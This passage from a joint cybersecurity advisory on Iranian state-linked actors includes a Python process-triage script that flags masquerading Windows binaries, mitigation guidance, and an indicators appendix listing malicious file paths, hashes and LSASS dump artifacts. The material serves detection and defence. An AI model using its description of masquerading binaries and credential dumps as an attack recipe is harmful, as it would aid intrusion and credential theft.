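    path = PureWindowsPath(proc["path"])
    name = path.name.lower()
    expected = EXPECTED_DIRS.get(name)
    if expected is None:
        return []           # not a watched name; cmd.exe launching notepad.exe is normal
    reasons = []
    if str(path.parent).lower() not in expected:
        reasons.append(f"{name} running from unexpected directory {path.parent}")
    parent = proc.get("parent_name", "").lower()
    if parent in SHELL_PARENTS:
        reasons.append(f"{name} spawned by {parent}")
    return reasons


def triage_all(procs):
    """Map pid -> reasons for every process that raised at least one reason."""
    findings = {}
    for proc in procs:
        reasons = triage_process(proc)
        if reasons:
            findings[proc["pid"]] = reasons
    return findings


# Constructed process inventory (not from the advisory); the paths for pids 4412 and 5120
# mirror the C:\Windows\svchost.exe and C:\Windows\dllhost.exe entries of Table 1.
SAMPLE_PROCS = [
    {"pid": 1204, "path": r"C:\Windows\System32\svchost.exe", "parent_name": "services.exe"},
    {"pid": 4412, "path": r"C:\Windows\svchost.exe",          "parent_name": "cmd.exe"},
    {"pid": 5120, "path": r"C:\Windows\dllhost.exe",          "parent_name": "powershell.exe"},
    {"pid": 3300, "path": r"C:\Windows\System32\notepad.exe", "parent_name": "cmd.exe"},
    {"pid": 7001, "path": r"C:\Windows\System32\lsass.exe",   "parent_name": "wininit.exe"},
]

if __name__ == "__main__":
    for pid, reasons in triage_all(SAMPLE_PROCS).items():
        print(pid, "; ".join(reasons))
```

The same record shape can be produced from a live host with a process listing that includes the image path and parent process name; the logic is deliberately independent of how the inventory is collected.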
Mitigations
The authoring agencies urge network defenders to prepare for and mitigate potential cyber threats immediately by implementing the mitigations below.
Implement and Enforce Backup and Restoration Policies and Procedures
- Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware or other destructive data incident and protect against data losses.
- Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
- Activate BitLocker on all networks and securely back up BitLocker keys with Microsoft and with an independent offline backup.
- Create, maintain, and exercise a basic cyber incident response plan that includes response procedures for a ransom incident.
- Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).
Patch and Update Systems
- U.S. federal, state, local, tribal, and territorial (SLTT) government and critical infrastructure organizations: Implement free CISA Cyber Hygiene Services Vulnerability Scanning to enable continuous scans of public, static IPs for accessible services and vulnerabilities.
- Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. Regularly check software updates and end-of-life notifications. Consider leveraging a centralized patch management system to automate and expedite the process.
- Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, CVE-2021-34523, CVE-2021-31207, CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-31196, CVE-2021-31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470.
Evaluate and Update Blocklists and Allowlists
- Regularly evaluate and update blocklists and allowlists.
- If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization’s execution blocklist. Prevent any attempts to install or run this program and its associated files.
Implement Network Segmentation
- Implement network segmentation to restrict a malicious threat actor’s lateral movement.
Secure User Accounts
- Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties.
- Require administrator credentials to install software.
Implement Multifactor Authentication
- Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups.
Use Strong Passwords
Secure and Monitor RDP and other Potentially Risky Services
- If you use RDP, restrict it to limit access to resources over internal networks. After assessing risks, if your organization deems RDP operationally necessary, restrict the originating sources, and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.
- Disable unused remote access/RDP ports.
- Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts (to block brute force campaigns), and log RDP login attempts.
Use Antivirus Programs
- Install and regularly update antivirus and anti-malware software on all hosts.
Secure Remote Access
- Only use secure networks.
- Consider installing and using a VPN for remote access.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
- Select an ATT&CK technique described in this advisory (see Appendix B).
- Align your security technologies against the technique.
- Test your technologies against the technique.
- Analyze your detection and prevention technologies’ performance.
- Repeat the process for all security technologies to obtain a set of comprehensive performance data.
- Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESPONDING TO RANSOMWARE OR EXTORTION INCIDENTS
If a ransomware or extortion incident occurs at your organization:
Note: The authoring agencies strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.
RESOURCES
- The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
- For more information on Iranian government-sponsored malicious cyber activity, see us-cert.cisa.gov/Iran and FBI’s Iran Threat page.
- For information and resources on protecting against and responding to ransomware or extortion activity, refer to StopRansomware.gov, the U.S. centralized, whole-of-government webpage providing ransomware resources and alerts.
- The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
- CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate malicious activity.
- ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at cyber.gov.au and via 1300 292 371 (1300 CYBER1).
PURPOSE
This advisory was developed by U.S., Australian, Canadian, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, USCC-CNMF, DoT, ACSC, CCCS, and NCSC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.
APPENDIX A: INDICATORS OF COMPROMISE
IP addresses and executable files are listed below. For a downloadable copy of IOCs, see AA22-257A.stix.
IP Addresses
Note: Some of these observed IP addresses may be outdated. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.
Malicious Domains
Files
Malicious files observed in this activity are identified in Table 1. Many of the below malicious files are masquerading as legitimate Windows files; therefore, file names alone should not be treated as an indicator of compromise. Note: For additional malicious files observed, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.
Table 1: Malicious files observed in this activity

| Filename | Path | MD5 | SHA-1 | SHA-256 |
|---|---|---|---|---|
| Wininet[.]xml | C:\Windows\Temp\wininet[.]xml | d2f4647a3749d30a35d5a8faff41765e | 0f676bc786db3c44cac4d2d22070fb514b4cb64c | 559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e |
| Wininet’[.]xml | | 2e1e17a443dc713f13f45a9646fc2179 | e75bfc0dd779d9d8ac02798b090989c2f95850dc | |
| WinLogon[.]xml | C:\Windows\Temp\WinLogon[.]xml | 49c71178fa212012d710f11a0e6d1a30 | 226f0fbb80f7a061947c982ccf33ad65ac03280f | bcc2e4d96e7418a85509382df6609ec9a53b3805effb7ddaed093bdaf949b6ea |
| Wininet[.]bat | C:\Windows\wininet[.]bat | 5f098b55f94f5a448ca28904a57c0e58 | 27102b416ef5df186bd8b35190c2a4cc4e2fbf37 | 668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0 |
| Winlogon[.]bat | C:\Windows\winlogon[.]bat | 7ac4633bf064ebba9666581b776c548f | 524443dd226173d8ba458133b0a4084a172393ef | d14d546070afda086a1c7166eaafd9347a15a32e6be6d5d029064bfa9ecdede7 |
| CacheTask[.]bat | C:\ProgramData\Microsoft\CacheTask[.]bat | ee8fd6c565254fe55a104e67cf33eaea | 24ed561a1ddbecd170acf1797723e5d3c51c2f5d | c1723fcad56a7f18562d14ff7a1f030191ad61cd4c44ea2b04ad57a7eb5e2837 |
| Task_update[.]exe | C:\Windows\Temp\task_update[.]exe | cacb64bdf648444e66c82f5ce61caf4b | 3a6431169073d61748829c31a9da29123dd61da8 | 12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a |
| Task[.]exe | | 5b646edb1deb6396082b214a1d93691b | 763ca462b2e9821697e63aa48a1734b10d3765ee | 17e95ecc7fedcf03c4a5e97317cfac166b337288562db0095ccd24243a93592f |
| dllhost[.]exe | C:\Windows\dllhost[.]exe | 0f8b592126cc2be0e9967d21c40806bc<br>9a3703f9c532ae2ec3025840fa449d4e | 3da45558d8098eb41ed7db5115af5a2c61c543af<br>8ece87086e8b5aba0d1cc4ec3804bf74e0b45bee | 724d54971c0bba8ff32aeb6044d3b3fd571b13a4c19cada015ea4bcab30cae26<br>1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e |
| svchost[.]exe | C:\Windows\svchost[.]exe | 68f58e442fba50b02130eedfc5fe4e5b<br>298d41f01009c6d6240bc2dc7b769205 | 76dd6560782b13af3f44286483e157848efc0a4e<br>6ca62f4244994b5fbb8a46bdfe62aa1c958cebbd | b04b97e7431925097b3ca4841b8941397b0b88796da512986327ff66426544ca<br>8aa3530540ba023fb29550643beb00c9c29f81780056e02c5a0d02a1797b9cd9 |
| User[.]exe | C:\Windows\Temp\user[.]exe | bd131ebfc44025a708575587afeebbf3<br>f0be699c8aafc41b25a8fc0974cc4582 | 8b23b14d8ec4712734a5f6261aed40942c9e0f68<br>6bae2d45bbd8c4b0a59ba08892692fe86e596154 | b8a472f219658a28556bab4d6d109fdf3433b5233a765084c70214c973becbbd<br>7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b |
| Setup[.]bat | C:\Users\DefaultAccount\Desktop\New folder\setup[.]bat | 7fdc2d007ef0c1946f1f637b87f81590 | | |
| Ssasl[.]pmd | C:\Windows\Temp\ssasl[.]pmd | | | |
| Ssasl[.]zip | C:\Windows\Temp\ssasl[.]zip | | | |
| netscanold[.]exe | C:\Users\DefaultAccount\Desktop\netscanold\netscanold[.]exe | | | |
| scan[.]csv | C:\Users\DefaultAccount\Desktop\scan[.]csv | | | |
| lsass[.]dmp | C:\Users\DefaultAccount\AppData\Local\Temp\lsass[.]dmp | | | |
| lsass[.]zip | C:\Users\DefaultAccount\AppData\Local\Temp\lsass[.]zip | | | |
APPENDIX B: MITRE ATT&CK TACTICS AND TECHNIQUES
Table 2 identifies MITRE ATT&CK Tactics and techniques observed in this activity.
Revisions
September 14, 2022: Initial Version